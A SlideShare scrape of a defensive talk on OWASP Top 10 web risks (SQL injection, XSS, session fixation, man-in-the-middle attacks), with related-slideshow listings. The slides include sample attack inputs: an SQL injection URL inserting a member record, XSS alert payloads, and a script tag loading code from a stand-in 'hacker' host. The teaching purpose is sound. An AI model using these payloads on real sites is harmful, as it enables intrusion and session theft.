SlideShare una empresa de Scribd logo
1 de 59
Are you feeling secure – notes from the trenches Paul Lemon  @anthonylime http://joind.in/3603
Introduction ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],About me
“ The problem of insecure software is perhaps the most important technical challenge of our time.”  –  OWASP Testing Guide Introduction. Photo courtesy http://www.flickr.com/photos/katescars/
Introduction ,[object Object],[object Object],[object Object],[object Object],This presentation
Introduction ,[object Object],[object Object],[object Object],OWASP
Introduction ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],OWASP Top 10
Introduction ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],OWASP Top 10
SQL Injection http://www.flickr.com/photos/andresrueda/2983149263/
Injection http://xkcd.com/327/
Injection http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('paul.lemon@gmail.com','hello',‘paul',’Paul Lemon'); Sample Code
Injection ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],How is it exploited
Injection Validation and Parameterised Query
Injection ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],How to prevent
Injection ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],A quick note about validation
XSS http://www.flickr.com/photos/andresrueda/2983149263/
XSS http://someserver/script.php?name=<script>alert();</script> or http://bit.ly/lYMcHjkj Sample XSS
XSS http:// host/script.php?name=<script src='http://hacker/script.js' /> Sample XSS
XSS Potential Exploits -  Theft of session cookies - Insertion of content / forms etc - Redirection to malicious sites - Insertion of trojan downloads / keyloggers etc.
XSS ,[object Object],[object Object],[object Object],[object Object]
XSS Trusted Not Trusted ,[object Object],[object Object],[object Object],[object Object],[object Object],Web application Browser
XSS – Trust zones Trusted Not Trusted API ,[object Object],[object Object],Web application
XSS – Trust zones Trusted Not Trusted Database ,[object Object],[object Object],[object Object],Web application
XSS – Trust zones Trusted Not Trusted API Database Web application Browser
XSS – Trust zones Trusted Not Trusted API Database Your application should be modular too Web application Browser
XSS Escape all output ,[object Object],[object Object],[object Object]
XSS Escape all output – context is important
XSS ?name=<script>alert(&quot;hello&quot;);</script>& link=javascript:alert('hello') Escape all output – context is important
XSS ?name=<script>alert(&quot;hello&quot;);</script>& link=javascript:alert('hello') Escape all output – context is important
XSS
XSS ,[object Object],[object Object],[object Object],[object Object],[object Object],Preventing XSS
XSS ,[object Object],[object Object],Cookies set as HTTPOnly
Session Exploits
Session Exploits ,[object Object],[object Object],Overview
Session Exploits ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Session Fixation
Session Exploits ,[object Object],Session Fixation – How to prevent
Session Exploits ,[object Object],[object Object],[object Object],[object Object],Session Fixation
Session Exploits ,[object Object],[object Object],Session Fixation – How to prevent
Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Web application Username / Password
Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Ahoy! Web application Username / Password
Session Exploits Man in the middle attacks Username / Password User logs in… Session Id - Cookie HTTP S  POST Web application
Session Exploits ,[object Object],[object Object],[object Object],[object Object],Man in the middle attacks
Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S  POST Web application
Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S  POST Web application
Session Exploits ,[object Object],[object Object],[object Object],[object Object],Man in the middle attacks
Session Exploits Man in the middle attacks
Session Exploits Man in the middle attacks
Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Web application Username / Password User logs in… Session Id - Cookie HTTP S  POST Web application
Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Curses! Web application Username / Password User logs in… Session Id - Cookie HTTP S  POST Web application
Session Exploits Man in the middle attacks ,[object Object],[object Object],[object Object],[object Object],[object Object]
Session Exploits Username / Password User logs in… Session Id – Cookie  SECURE HTTP S  POST Open Zone of Web application User visits a non-secure page Resource downloaded HTTP GET Session Id Extra Auth – Cookie  SECURE Web application
Session Exploits Username / Password User logs in… Session Id – Cookie  SECURE HTTP S  POST Secure Zone of Web application User visits a non-secure page Response HTTP S  GET/POST/PUT Session Id Extra Auth – Cookie  SECURE Extra Auth – Cookie Web application
XSRF
XSRF – Sorry no time
Conclusions
Conclusions Get someone else to do the work
Conclusions ,[object Object],[object Object],[object Object],[object Object],Get someone else to do the work
Conclusions ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Recommendations
[object Object],[object Object],[object Object],[object Object],[object Object],Conclusions Resources
Are you feeling secure – notes from the trenches Paul Lemon  @anthonylime – paul.lemon@gmail.com http://joind.in/3603

Más contenido relacionado

La actualidad más candente

OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum   Top 10 A3 - 6th meetingOWASP Khartoum   Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmedRashid Khatmey
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Netalsmola
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
OAuth2 - The Swiss Army Framework
OAuth2 - The Swiss Army FrameworkOAuth2 - The Swiss Army Framework
OAuth2 - The Swiss Army FrameworkBrent Shaffer
 
4 andrii kudiurov - web application security 101
4   andrii kudiurov - web application security 1014   andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101Ievgenii Katsan
 

La actualidad más candente (20)

Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum   Top 10 A3 - 6th meetingOWASP Khartoum   Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
 
4.Xss
4.Xss4.Xss
4.Xss
 
Security Function
Security FunctionSecurity Function
Security Function
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Net
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
OAuth2 - The Swiss Army Framework
OAuth2 - The Swiss Army FrameworkOAuth2 - The Swiss Army Framework
OAuth2 - The Swiss Army Framework
 
4 andrii kudiurov - web application security 101
4   andrii kudiurov - web application security 1014   andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101
 

Destacado

"Ο μικρός αδελφός", Φ. Κουρουνάκης
"Ο μικρός αδελφός", Φ. Κουρουνάκης"Ο μικρός αδελφός", Φ. Κουρουνάκης
"Ο μικρός αδελφός", Φ. ΚουρουνάκηςΣταυριανάκη Νίκη
 
Wittner partners in learning leslla 2011
Wittner partners in learning leslla 2011Wittner partners in learning leslla 2011
Wittner partners in learning leslla 2011lizwittner
 
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013IQ Partners S.A.: Wyniki finansowe za III kwartał 2013
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013IQ Partners
 
3d3 Presentation
3d3 Presentation3d3 Presentation
3d3 Presentationpionarch
 
Macabees nme dps analysis
Macabees nme dps analysisMacabees nme dps analysis
Macabees nme dps analysisjessiekeegan
 
Location based marketing presentation for tag
Location based marketing presentation for tagLocation based marketing presentation for tag
Location based marketing presentation for tagJanet Whitehead
 
Huntingdon Fusion Techniques Pipestoppers™ Range
Huntingdon Fusion Techniques Pipestoppers™ RangeHuntingdon Fusion Techniques Pipestoppers™ Range
Huntingdon Fusion Techniques Pipestoppers™ RangeClemenceretel
 
My presentation
My presentationMy presentation
My presentationmariyasyd
 
Harits wiguna materi softskill
Harits wiguna materi softskillHarits wiguna materi softskill
Harits wiguna materi softskillRietz Wiguna
 
Visits slayt
Visits slaytVisits slayt
Visits slaytcalkan
 
Tourism Industry Association of the Yukon Conference
Tourism Industry Association of the Yukon ConferenceTourism Industry Association of the Yukon Conference
Tourism Industry Association of the Yukon ConferenceJohn Gunter
 
Media Music Video Pitch
Media Music Video PitchMedia Music Video Pitch
Media Music Video Pitchmananvekaria
 
BelgianUSeconomy
BelgianUSeconomyBelgianUSeconomy
BelgianUSeconomybdeelen
 
ARTES EN EL REINO UNIDO.
ARTES EN EL REINO UNIDO.ARTES EN EL REINO UNIDO.
ARTES EN EL REINO UNIDO.Cyntia Ocañas
 

Destacado (19)

"Ο μικρός αδελφός", Φ. Κουρουνάκης
"Ο μικρός αδελφός", Φ. Κουρουνάκης"Ο μικρός αδελφός", Φ. Κουρουνάκης
"Ο μικρός αδελφός", Φ. Κουρουνάκης
 
Wittner partners in learning leslla 2011
Wittner partners in learning leslla 2011Wittner partners in learning leslla 2011
Wittner partners in learning leslla 2011
 
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013IQ Partners S.A.: Wyniki finansowe za III kwartał 2013
IQ Partners S.A.: Wyniki finansowe za III kwartał 2013
 
3d3 Presentation
3d3 Presentation3d3 Presentation
3d3 Presentation
 
Macabees nme dps analysis
Macabees nme dps analysisMacabees nme dps analysis
Macabees nme dps analysis
 
Top 10 tech tools
Top 10 tech toolsTop 10 tech tools
Top 10 tech tools
 
Location based marketing presentation for tag
Location based marketing presentation for tagLocation based marketing presentation for tag
Location based marketing presentation for tag
 
Huntingdon Fusion Techniques Pipestoppers™ Range
Huntingdon Fusion Techniques Pipestoppers™ RangeHuntingdon Fusion Techniques Pipestoppers™ Range
Huntingdon Fusion Techniques Pipestoppers™ Range
 
My presentation
My presentationMy presentation
My presentation
 
Harits wiguna materi softskill
Harits wiguna materi softskillHarits wiguna materi softskill
Harits wiguna materi softskill
 
Thomas
ThomasThomas
Thomas
 
Visits slayt
Visits slaytVisits slayt
Visits slayt
 
Office tips and tricks
Office tips and tricksOffice tips and tricks
Office tips and tricks
 
Iceland Volcano
Iceland  VolcanoIceland  Volcano
Iceland Volcano
 
Tourism Industry Association of the Yukon Conference
Tourism Industry Association of the Yukon ConferenceTourism Industry Association of the Yukon Conference
Tourism Industry Association of the Yukon Conference
 
Group 1 hao_nv
Group 1 hao_nvGroup 1 hao_nv
Group 1 hao_nv
 
Media Music Video Pitch
Media Music Video PitchMedia Music Video Pitch
Media Music Video Pitch
 
BelgianUSeconomy
BelgianUSeconomyBelgianUSeconomy
BelgianUSeconomy
 
ARTES EN EL REINO UNIDO.
ARTES EN EL REINO UNIDO.ARTES EN EL REINO UNIDO.
ARTES EN EL REINO UNIDO.
 

Similar a OWASP Top 10 Web Security Risks Explained

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Mobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & ManagementMobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & ManagementBarrel Software
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET ApplicationIron Speed
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksPayPalX Developer Network
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code HardeningOdoo
 

Similar a OWASP Top 10 Web Security Risks Explained (20)

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
Application Security
Application SecurityApplication Security
Application Security
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Php security common 2011
Php security common 2011Php security common 2011
Php security common 2011
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservices
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Web Security
Web SecurityWeb Security
Web Security
 
Mobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & ManagementMobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & Management
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common Attacks
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code Hardening
 

Último

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 

Último (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

OWASP Top 10 Web Security Risks Explained

Notas del editor

  1. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  2. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
